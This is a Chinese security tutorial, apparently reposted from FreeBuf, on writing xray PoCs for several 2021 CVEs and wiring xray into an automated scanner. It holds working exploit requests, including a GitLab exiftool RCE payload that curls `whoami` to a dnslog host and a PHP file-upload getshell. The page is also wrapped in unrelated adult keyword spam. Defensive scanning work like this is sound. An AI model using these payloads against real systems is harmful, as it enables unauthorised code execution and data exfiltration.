在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

我的漏洞掃描及安全應(yīng)急之道

jf_Fo0qk3ln ? 來(lái)源:FreeBuf.COM ? 2023-09-14 10:42 ? 次閱讀

編寫POC

以xray為例

學(xué)習(xí)文檔

先學(xué)習(xí)下相關(guān)文檔,大家挨個(gè)看一遍就行,有個(gè)印象即可,不用死記硬背。

如何編寫YAML格式POC

POC語(yǔ)法V2版

如何編寫高質(zhì)量的 poc

BugScan 插件開發(fā)文檔

插件編寫

官方公布最基礎(chǔ)的POC如下

name: poc-yaml-example-com
# 腳本部分
transport: http
rules:
    r1:
        request:
            method: GET
            path: "/"
        expression: |
            response.status==200 && response.body.bcontains(b'Example Domain')
expression:
    r1()
# 信息部分
detail:
    author: name(link)
    links: 
        - http://example.com

編寫編輯器

poc實(shí)踐

CVE-2021-3654

路徑處理出了問(wèn)題,網(wǎng)站域名加上//example.com/%2f..即可進(jìn)行url跳轉(zhuǎn)

直接get請(qǐng)求,所以poc很簡(jiǎn)單,有手就行。

name: poc-yaml-novnc-url-redirection-cve-2021-3654
manual: true
transport: http
rules:
  - method: GET
    path: "http://baidu.com/%2f.."
    follow_redirects: false
    expression: |
      response.headers['location']=="http://baidu.com/%2f../"
detail:
  author: txf(https://github.com/tangxiaofeng7)
  links:
    - https://seclists.org/oss-sec/2021/q3/188

CVE-2021-22205

exiftool解析造成的rce
一共發(fā)送2個(gè)請(qǐng)求

dff44200-5297-11ee-a25d-92fbcf53809c.jpg

請(qǐng)求1:

GET /users/sign_in HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

獲取csrf-token

請(qǐng)求2:

POST /uploads/user HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
X-CSRF-Token: xxx==
Cookie: xx
Content-Length: 879


------WebKitFormBoundaryIMv3mxRg59TkFSX5
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg

AT&TFORM?DJVMDIRM.?F????? !?N????k?D,q?I?n????"?FORM^DJVUINFO
dINCLshared_anno.iffBG44J???7?*?BG44??BG44
FORMDJVIANTaP(metadata
(Copyright "
" . qx{curl `whoami`.dnslog.cn} . 
" b ") )

------WebKitFormBoundaryIMv3mxRg59TkFSX5--

上傳圖片觸發(fā)rce。

由于xray目前支持的編碼解碼有限,不支持hex解碼,所以我們直接寫的簡(jiǎn)單點(diǎn),使用隨機(jī)字符進(jìn)行判斷,poc很簡(jiǎn)單,有手就行。

name: poc-yaml-gitlab-cve-2021-22205-rce
set:
  r1: randomInt(1, 9999)
  r2: randomInt(1, 9999)
manual: true
transport: http
rules:
  - method: GET
    path: "/users/sign_in"
    expression: response.status == 200
    search: >-
      name="csrf-token" content="(?P.+?)"
  - method: POST
    path: "/uploads/user"
    headers:
      X-CSRF-Token: |-
        {{token}}
      Content-Type: |-
        multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
      Accept: "*/*"
    body: |-
      ------WebKitFormBoundaryIMv3mxRg59TkFSX5
      Content-Disposition: form-data; name="file"; filename="{{r1}}.jpg"
      Content-Type: image/jpeg
      {{r2}}
      ------WebKitFormBoundaryIMv3mxRg59TkFSX5--
    expression: response.body.bcontains(b'Failed to process image')

detail:
  author: txf(https://github.com/tangxiaofeng7)
  links:
    - https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released

CVE-2021-27905

這是SSRF漏洞,需要使用反連平臺(tái),加上reverse的即可,官方寫的很詳細(xì)了。所以poc很簡(jiǎn)單,有手就行。

name: poc-yaml-solr-cve-2021-27905-ssrf
manual: true
transport: http
set:
  reverse: newReverse()
  reverseURL: reverse.url
rules:
  - method: GET
    path: "/solr/admin/cores?indexInfo=false&wt=json"
    expression: |
      response.status == 200
    search: >-
      "name":"(?P.+?)"
  - method: POST
    path: "/solr/{{name}}/replication/?command=fetchindex&masterUrl={{reverseURL}}"
    expression: |
      reverse.wait(5)
detail:
  author: txf(https://github.com/tangxiaofeng7)
  links:
    - https://github.com/murataydemir/CVE-2021-27905

0day應(yīng)急

不管是甲方還是乙方,一旦暴出新漏洞,應(yīng)急顯得非常重要。
大部分人都是直接寫poc批量檢測(cè)內(nèi)部應(yīng)用,當(dāng)然我也不例外。

舉個(gè)例子:
泛微e-office 文件上傳漏洞風(fēng)險(xiǎn)通告(CNVD-2021-49104)

部署靶場(chǎng)環(huán)境

影響版本
泛微e-office V9.0
首先虛擬機(jī)安裝下。
e00e5104-5297-11ee-a25d-92fbcf53809c.jpg
安裝完成后,默認(rèn)賬號(hào)admin,密碼為空。

POC構(gòu)造

Burpsuite原始包文

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 10.211.55.11:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.211.55.11:8080/login.php
Cookie: LOGIN_LANG=cn; PHPSESSID=c57f0b37a12cf9dd61e35b909289d1b9
Pragma: no-cache
Cache-Control: no-cache
Content-Type: multipart/form-data;boundary=e64bdf16c554bbc109cecef6451c26a4
Content-Length: 191

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test1.php"
Content-Type: image/jpeg

123

--e64bdf16c554bbc109cecef6451c26a4--

訪問(wèn)上傳的文件是否生效
e02e7f60-5297-11ee-a25d-92fbcf53809c.jpg

編寫poc

name: poc-yaml-e-office-v9-upload-getshell
manual: true
transport: http
set:
    r1: randomLowercase(8)
rules:
    r1:
        request:
            cache: true
            method: POST
            path: /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
            headers:
                Content-Type: multipart/form-data;boundary=e64bdf16c554bbc109cecef6451c26a4
            body: |-
                --e64bdf16c554bbc109cecef6451c26a4
                Content-Disposition: form-data; name="Filedata"; filename="{{r1}}.php"
                Content-Type: image/jpeg

                {{r1}}
                --e64bdf16c554bbc109cecef6451c26a4--
        expression: response.status == 200 && response.body.bcontains(b"logo-eoffice.php")
    r2:
        request:
            cache: true
            method: GET
            path: /images/logo/logo-eoffice.php
        expression: response.status == 200 && response.body.bcontains(bytes(r1))
expression: r1() && r2()
detail:
    author: test
    links:
        - https://github.com/chaitin/xray/pull/1540/files

XRAY批量

將需要掃描的url寫到url.txt里,然后執(zhí)行如下命令。

./xray_darwin_amd64 webscan --poc "/Users/txf/poc/e-officev9-upload-getshell.yml" --url-file url.txt --html-output result.txt

e04905b0-5297-11ee-a25d-92fbcf53809c.jpg

DIY自動(dòng)化掃描器

之前看了linglong(一款資產(chǎn)巡航掃描系統(tǒng))的源碼,在他的基礎(chǔ)上重構(gòu)了一些功能。
一起看看我是如何把xray加到自動(dòng)化掃描器中。

掃描器開關(guān)

在linglong的基礎(chǔ)上,我為掃描器添加了開關(guān)。
e05efa3c-5297-11ee-a25d-92fbcf53809c.jpg
在代碼中定義了一個(gè)布爾值來(lái)做控制。

端口掃描

跟市面上掃描器意義,使用masscan去掃描存活端口,使用nmap進(jìn)行端口的指紋識(shí)別。
原因:

1.Nmap在掃描數(shù)量較大的目標(biāo)時(shí)性能緩慢

2.Masscan在高速率的掃描較大端口范圍時(shí)結(jié)果不太準(zhǔn)確

web指紋掃描

直接用的開源的識(shí)別工具加到代碼里。

漏洞掃描

在進(jìn)行xray漏洞掃描之前,先定義掃描目標(biāo)的格式,代碼如下:
e08746cc-5297-11ee-a25d-92fbcf53809c.jpg

然后調(diào)用cmd終端執(zhí)行xray掃描即可。
e0977092-5297-11ee-a25d-92fbcf53809c.jpg

結(jié)果通知

直接寫一個(gè)企業(yè)微信機(jī)器人的通知。
e0b13216-5297-11ee-a25d-92fbcf53809c.jpg

當(dāng)然也可以用xray自帶的webhook通知,沒用過(guò),這里感興趣的可以試試。

端口指紋界面:
e0d131ec-5297-11ee-a25d-92fbcf53809c.jpg

漏洞界面:

e0ef4a1a-5297-11ee-a25d-92fbcf53809c.jpg

當(dāng)然如果是企業(yè)自查xray肯定可以開啟掃描,如果是SRC掃描的話不建議開xray去掃描,動(dòng)靜太大了。

尾聲

如果針對(duì)外網(wǎng)掃描的話,建議再加上waf識(shí)別,cdn識(shí)別,否則效率會(huì)很低,還容易被封ip。

總的來(lái)說(shuō)挖掘SRC,更重要的是信息收集。

這就是目前安全應(yīng)急和漏洞掃描的方法,歡迎大家積極交流。

作者:tangxiaofeng7,轉(zhuǎn)載于FreeBuf.COM

審核編輯:湯梓紅

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • 漏洞掃描
    +關(guān)注

    關(guān)注

    0

    文章

    14

    瀏覽量

    7306
  • PoC
    PoC
    +關(guān)注

    關(guān)注

    1

    文章

    70

    瀏覽量

    20522
  • 編輯器
    +關(guān)注

    關(guān)注

    1

    文章

    806

    瀏覽量

    31172

原文標(biāo)題:干貨|我的漏洞掃描及安全應(yīng)急之道

文章出處:【微信號(hào):菜鳥學(xué)信安,微信公眾號(hào):菜鳥學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏

    評(píng)論

    相關(guān)推薦

    基于樹莓派2 blacktrack的系統(tǒng)漏洞掃描

    本帖最后由 weizhizhou 于 2017-4-30 00:06 編輯 基于樹莓派2 blacktrack的系統(tǒng)漏洞掃描對(duì)Linux系統(tǒng)開發(fā)有5年了,近期在blackberry2上移植把玩
    發(fā)表于 04-29 09:59

    安全瀏覽器竟然也被查出高危漏洞?開源安全問(wèn)題不容忽視

    軟件里包含哪些開源組件,是否存在嚴(yán)重安全隱患。 中國(guó)開源安全聯(lián)盟(www.cvecn.com)部分的解決了這些開源漏洞的定位問(wèn)題。聯(lián)盟在其官網(wǎng)上提供免費(fèi)二進(jìn)制可執(zhí)行文件掃描服務(wù)。可以對(duì)
    發(fā)表于 09-05 14:26

    固件漏洞安全問(wèn)題的解決辦法

    安全性。  據(jù)Gartner數(shù)據(jù),截止2022年,約有70%未執(zhí)行固件升級(jí)計(jì)劃的組織將由于固件漏洞而遭到入侵。而今年疫情的出現(xiàn)也導(dǎo)致了全球供應(yīng)鏈不斷增加的中短期風(fēng)險(xiǎn)?!   」碳?b class='flag-5'>漏洞正逐年增加
    發(fā)表于 09-07 17:16

    一個(gè)基于漏洞掃描安全中間件架構(gòu)設(shè)計(jì)

    本文結(jié)合漏洞掃描技術(shù)和安全中間件技術(shù),提出了一種基于漏洞掃描安全中間件的系統(tǒng)結(jié)構(gòu)。該系統(tǒng)將
    發(fā)表于 09-03 09:18 ?18次下載

    [代碼整潔之道].(美)馬丁.掃描

    電子發(fā)燒友網(wǎng)站提供《[代碼整潔之道].(美)馬丁.掃描版.txt》資料免費(fèi)下載
    發(fā)表于 02-06 16:47 ?0次下載

    分解漏洞掃描,什么是漏洞掃描

    5W2H?分解漏洞掃描 - WHAT WHAT?什么是漏洞掃描? 首先什么是漏洞? 國(guó)內(nèi)外各種規(guī)范和標(biāo)準(zhǔn)中關(guān)于
    的頭像 發(fā)表于 10-12 16:38 ?1291次閱讀
    分解<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>,什么是<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>?

    分解漏洞掃描,為什么要做漏洞掃描呢?

    5W2H?分解漏洞掃描 - WHY WHY?為什么要做漏洞掃描呢? 降低資產(chǎn)所面臨的風(fēng)險(xiǎn) 上文提到漏洞的典型特征:系統(tǒng)的缺陷/弱點(diǎn)、可能被威
    的頭像 發(fā)表于 10-12 16:39 ?1382次閱讀
    分解<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>,為什么要做<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>呢?

    華為云VSS漏洞掃描服務(wù)為你排除Apache log4j2隱患

    華為云VSS漏洞掃描服務(wù)為你排除Apache log4j2隱患 近日Apache Log4j2漏洞持續(xù)發(fā)酵,已成為中國(guó)互聯(lián)網(wǎng)2021年年底前最大的安全事件。華為云VSS
    的頭像 發(fā)表于 10-13 13:52 ?1008次閱讀
    華為云VSS<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>服務(wù)為你排除Apache log4j2隱患

    XSS漏洞掃描器工具

    XSpear是一款基于RubyGems的的XSS漏洞掃描器。擁有常見的XSS漏洞掃描攻擊測(cè)試功能。還可進(jìn)行參數(shù)分析。
    的頭像 發(fā)表于 01-17 09:28 ?1882次閱讀

    常見的漏洞掃描工具

    漏洞掃描工具是現(xiàn)代企業(yè)開展?jié)B透測(cè)試服務(wù)中必不可少的工具之一,可以幫助滲透測(cè)試工程師快速發(fā)現(xiàn)被測(cè)應(yīng)用程序、操作系統(tǒng)、計(jì)算設(shè)備和網(wǎng)絡(luò)系統(tǒng)中存在的安全風(fēng)險(xiǎn)與漏洞,并根據(jù)這些
    的頭像 發(fā)表于 06-28 09:42 ?1725次閱讀
    常見的<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>工具

    最常見的網(wǎng)絡(luò)安全12種漏洞掃描類型

    數(shù)據(jù)庫(kù)掃描技術(shù)主要用于評(píng)估數(shù)據(jù)庫(kù)系統(tǒng)的安全性,該類型會(huì)全面查找數(shù)據(jù)庫(kù)設(shè)置、訪問(wèn)控制和存儲(chǔ)數(shù)據(jù)的漏洞,比如不安全的權(quán)限、漏洞注入問(wèn)題或不
    發(fā)表于 07-12 12:41 ?1444次閱讀
    最常見的網(wǎng)絡(luò)<b class='flag-5'>安全</b>12種<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>類型

    ntopng如何將漏洞掃描與流量監(jiān)控相結(jié)合,以提高網(wǎng)絡(luò)安全

    ntopng為人所知的“身份”是被動(dòng)流量監(jiān)控。然而,如今的ntopng6.0也進(jìn)化出主動(dòng)監(jiān)控功能來(lái),漏洞掃描功能便是其中一個(gè)。那么漏洞掃描功能是什么?其獨(dú)特之處是什么?用戶該如何使用?
    的頭像 發(fā)表于 11-25 08:04 ?405次閱讀
    ntopng如何將<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>與流量監(jiān)控相結(jié)合,以提高網(wǎng)絡(luò)<b class='flag-5'>安全</b>性

    POC管理和漏洞掃描小工具

    本工具是采用javafx編寫,使用sqllite進(jìn)行poc儲(chǔ)存的poc管理和漏洞掃描集成化工具。主要功能是poc管理,并且采用多線程進(jìn)行漏洞掃描。
    的頭像 發(fā)表于 01-09 11:01 ?843次閱讀
    POC管理和<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>小工具

    漏洞掃描的主要功能是什么

    漏洞掃描是一種網(wǎng)絡(luò)安全技術(shù),用于識(shí)別計(jì)算機(jī)系統(tǒng)、網(wǎng)絡(luò)或應(yīng)用程序中的安全漏洞。這些漏洞可能被惡意用戶利用來(lái)獲取未授權(quán)訪問(wèn)、數(shù)據(jù)泄露或其他形式的
    的頭像 發(fā)表于 09-25 10:25 ?408次閱讀

    漏洞掃描一般采用的技術(shù)是什么

    漏洞掃描是一種安全實(shí)踐,用于識(shí)別計(jì)算機(jī)系統(tǒng)、網(wǎng)絡(luò)或應(yīng)用程序中的安全漏洞。以下是一些常見的漏洞掃描
    的頭像 發(fā)表于 09-25 10:27 ?366次閱讀
    主站蜘蛛池模板: 国产乱通伦| 亚洲福利二区| 一区二区福利| 午夜欧美成人久久久久久| 免费的毛片| 久久黄网站| 欧美肉到失禁高h视频在线| 最新色站| 亚洲人成电影综合网站色| 天堂国产| 蜜月mv国产精品| 爱啪网站| 免费人成网站永久| 禁网站在线观看免费视频| 特级淫片aaaa毛片aa视频| 丁香九月婷婷| 欧美大黄| 最新激情网址| 日韩h视频| 国产免费一级高清淫曰本片| 两性色午夜视频免费老司机| av手机在线播放| 日本三级带日本三级带黄首页| 国产在线色视频| 高清在线观看视频| 国产午夜精品久久久久免费视| 性欧美xxx 不卡视频| 男人边吃奶边做视频免费网站| 91精选视频在线观看| 91中文字幕视频| 日本资源在线| 天堂资源网| 国产免费亚洲| 国产伦理一区二区三区| 欧美极品另类xxx| 欧美伊人| 午夜寂寞影| 97一区二区三区| 成年网站在线| 亚洲a视频| 国产香蕉视频在线播放|